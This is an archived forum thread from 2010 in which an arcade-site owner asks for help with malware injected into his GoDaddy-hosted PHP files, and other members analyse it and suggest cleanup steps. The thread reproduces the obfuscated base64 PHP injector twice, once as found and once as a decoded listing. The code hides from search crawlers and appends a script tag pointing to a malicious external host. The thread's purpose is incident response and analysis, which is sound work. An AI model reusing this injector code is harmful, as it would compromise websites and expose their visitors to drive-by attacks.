PDA

View Full Version : Another atempt to hack an av arcade site



Mircea007
10-31-2010, 08:29 PM
Im not sure yet im still looking into it ... but i think my site got attacked by some malaware.
When i opened my site this morning it redirect me to another page ..... i opened it again that didnt happen anymore .... I opened it with IE and some other stuff popped like an antivirus was trying to scan my computer

I opened index.php and i found this on the top

/**/ $_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x 69\x6f\x6e";$_8b7b1f="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x 65";$_8b7b1f56=$_8b7b("",$_8b7b1f("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZX QoJEdMT0JBTFNbJ21ybm8nXSkpeyAgICRHTE9CQUxTWydtcm5v J109MTsgICBpZighZnVuY3Rpb25fZXhpc3RzKCdjcm9wZXJ4Jy kpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2FkZHhpdCcp KXsgICAgIGZ1bmN0aW9uIGFkZHhpdCgpeyAgICAgIGlmICghc3 RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdv b2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1 VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4g YmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSE E2THk5cGJuTnZiVzVwWVdKdmJHUnBibVp2YjNKbkxtTnZiUzlz YkM1d2FIQS9hejB4SWo0OEwzTmpjbWx3ZEQ0PSIpOyAgICAgIH 0gICAgICByZXR1cm4gIiI7ICAgICB9ICAgIH0gICAgICAgIGlm KCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpeyAgICAgZn VuY3Rpb24gZ3pkZWNvZGUoJFI1QTlDRjFCNDk3NTAyQUNBMjND OEY2MTFBNTY0Njg0Qyl7ICAgICAgJFIzMEIyQUI4REMxNDk2RD A2QjIzMEE3MUQ4OTYyQUY1RD1Ab3JkKEBzdWJzdHIoJFI1QTlD RjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywzLDEpKTsgIC AgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5 PTEwOyAgICAgICRSQTNENTJFNTJBNDg5MzZDREUwRjUzNTZCQj A4NjUyRjI9MDsgICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZC MjMwQTcxRDg5NjJBRjVEJjQpeyAgICAgICAkUjYzQkVERTZCMT kyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPUB1bnBhY2soJ3YnLHN1 YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2OD RDLDEwLDIpKTsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVB RDA3QTREOTFFMjlFQj0kUjYzQkVERTZCMTkyNjZENEVGRUFEMD dBNEQ5MUUyOUVCWzFdOyAgICAgICAkUkJFNEM0RDAzN0U5Mzky MjZGNjU4MTI4ODVBNTNEQUQ5Kz0yKyRSNjNCRURFNkIxOTI2Nk Q0RUZFQUQwN0E0RDkxRTI5RUI7ICAgICAgfSAgICAgIGlmKCRS MzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmOCl7IC AgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RB RDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMU E1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4 MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQj JBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjE2KXsgICAg ICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT 1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2 NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMj g4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFC OERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMil7ICAgICAgIC RSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTI7 ICAgICAgfSAgICAgICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QT E4MjJEQTMzNTM9QGd6aW5mbGF0ZShAc3Vic3RyKCRSNUE5Q0Yx QjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsJFJCRTRDNEQwMz dFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkpOyAgICAgIGlmKCRS MDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9PT1GQU xTRSl7ICAgICAgICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4 MjJEQTMzNTM9JFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNT Y0Njg0QzsgICAgICB9ICAgICAgcmV0dXJuICRSMDM0QUUyQUI5 NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM7ICAgICB9ICAgIH0gIC AgZnVuY3Rpb24gY3JvcGVyeCgkUkU4MkVFOUIxMjFGNzA5ODk1 RUY1NEVCQTdGQTZCNzhCKXsgICAgIEhlYWRlcignQ29udGVudC 1FbmNvZGluZzogbm9uZScpOyAgICAgJFJBMTc5QUJEM0E3QjlF MjhDMzY5RjdCNTlDNTFCODFERT1nemRlY29kZSgkUkU4MkVFOU IxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKTsgICAgICAgaWYo cHJlZ19tYXRjaCgnL1w8XC9ib2R5L3NpJywkUkExNzlBQkQzQT dCOUUyOEMzNjlGN0I1OUM1MUI4MURFKSl7ICAgICAgcmV0dXJu IHByZWdfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaS csYWRkeGl0KCkuIlxuIi4nJDEnLCRSQTE3OUFCRDNBN0I5RTI4 QzM2OUY3QjU5QzUxQjgxREUpOyAgICAgfWVsc2V7ICAgICAgcm V0dXJuICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgx REUuYWRkeGl0KCk7ICAgICB9ICAgIH0gICAgb2Jfc3RhcnQoJ2 Nyb3BlcngnKTsgICB9ICB9"));$_8b7b1f56();?>
<?php




Any ideas ?

Chuckun
11-01-2010, 12:32 AM
That would be an injection of some description..

Either they used a shell script to edit the file directly - to do this they would've had to upload the shell script to your arcade via an insecure submission... This could be a form or upload script, possibly a shoddy modification?

Also, they could've simply hacked into your cPanel and edit the file.. Or retrieved your password via malware/keyloggers within your computer..

Chuckun

Mircea007
11-01-2010, 12:39 AM
well i deleted that part. how do i find what file they upload

GoalieGuy6
11-01-2010, 01:16 AM
I don't know how they got in, but after reverse engineering the script here's what it looks like. Basically it just adds an external javascript into your page.

Btw, would you domain happen to be hosted with GoDaddy (http://blog.sucuri.net/2010/10/attacks-on-godaddy-sites-insomniaboldinfoorg-com.html)?

It adds this to your page. I'd see if you can find any info on that site.

<script src="http://insomniaboldinfoorg.com/ll.php?k=1"></script>

This is what the code looks like.

<?php
$myFunction = create_function("",

if(function_exists('ob_start') && !isset($GLOBALS['mrno']))
{
$GLOBALS['mrno']=1;

if(!function_exists('croperx'))
{
if(!function_exists('addxit'))
{
function addxit(){
if (!stristr($_SERVER["HTTP_USER_AGENT"], "googlebot") && (!stristr($_SERVER["HTTP_USER_AGENT"], "yahoo")))
{
return '<script src="http://insomniaboldinfoorg.com/ll.php?k=1"></script>';
}
return "";
}
}

if(!function_exists('gzdecode'))
{
function gzdecode($Variable_1)
{
$Variable_2 = ord(substr($Variable_1, 3, 1));
$Variable_3 = 10;
$Variable_4 = 0;

if($Variable_2 & 4)
{
$Variable_5 = @unpack('v', substr($Variable_1, 10, 2));
$Variable_5 = $Variable_5[1];
$Variable_3 += 2 + $Variable_5;
}

if($Variable_2 & 8)
{
$Variable_3 = strpos($Variable_1, chr(0), $Variable_3) + 1;
}

if($Variable_2 & 16)
{
$Variable_3 = strpos($Variable_1, chr(0), $Variable_3) + 1;
}

if($Variable_2 & 2)
{
$Variable_3 += 2;
}

$Variable_6 = gzinflate(substr($Variable_1, $Variable_3));

if($Variable_6 === FALSE)
{
$Variable_6 = $Variable_1;
}

return $Variable_6;
}
}

function croperx($Variable_7)
{
Header('Content-Encoding: none');
$Variable_8 = gzdecode($Variable_7);
if(preg_match('/\<\/body/si', $Variable_8))
{
return preg_replace('/(\<\/body[^\>]*\>)/si', addxit() . "\n" . '$1', $Variable_8);
}
else
{
return $Variable_8 . addxit();
}
}

ob_start('croperx');
}
}

$myFunction();
?>

Mircea007
11-01-2010, 02:08 AM
that is weird i guess ill take my user submission down until i can fix it so this doesnt happen again. how do i take care of that. and yes i am with godaddy

GoalieGuy6
11-01-2010, 02:21 AM
It seems to have been a problem with GoDaddy, it may not have been a vulnerability in your site. You should probably contact them.

Mircea007
11-01-2010, 03:16 AM
i talked to godaddy they said they will seach see if there is an issue from their part. in meantime how do i get rid of that? should i just delete the code. where did you pulled that code goalie.....index.php?

Chuckun
11-01-2010, 03:45 PM
You should definitely delete the code..

The code that Goalie told you about was actually a decoded version of what you posted (he basically reversed the base64(or whatever) coding)

Jack

Mircea007
11-01-2010, 03:58 PM
that code is at the begining of each page everysingle file in my website .... so there has to be a source but i can't find it .....

if i open the page source with firefox all the way at the bottom it has the script but i don't know where that is located maybe if i delete the origin the other things will be ok

GoalieGuy6
11-01-2010, 07:26 PM
If you look at the article I linked to, there is a script that can be used to automatically clean all your files near the bottom of it. You should also look at your access logs and see if you can figure out when/how the code got added.

Mircea007
11-01-2010, 10:06 PM
thank you golie i didn't notice the article i did what it said there and it got rid of the problem in 2 min and all the code was deleted. now i just have to figure it out how they did that i think its mostly godaddy's fault

GoalieGuy6
11-01-2010, 10:37 PM
You're welcome :)

Now you just need to figure out how the code got in.

Bad Wolf
11-01-2010, 11:09 PM
You're welcome :)

Now you just need to figure out how the code got in.

And get a new host bro. Gdaddy's great for buying domains but are a really bad choice for a host IMO. They have a pretty bad rep for having lax security among other things. But of course their thing aint hosting so thats why. Still you'd think they make enough money to afford to have decent security for their clients.

Mircea007
11-01-2010, 11:37 PM
true i will look to see some other hosting options. ive been with godaddy since i started the site never had problems. The server never crashed or anything but security is a main factor.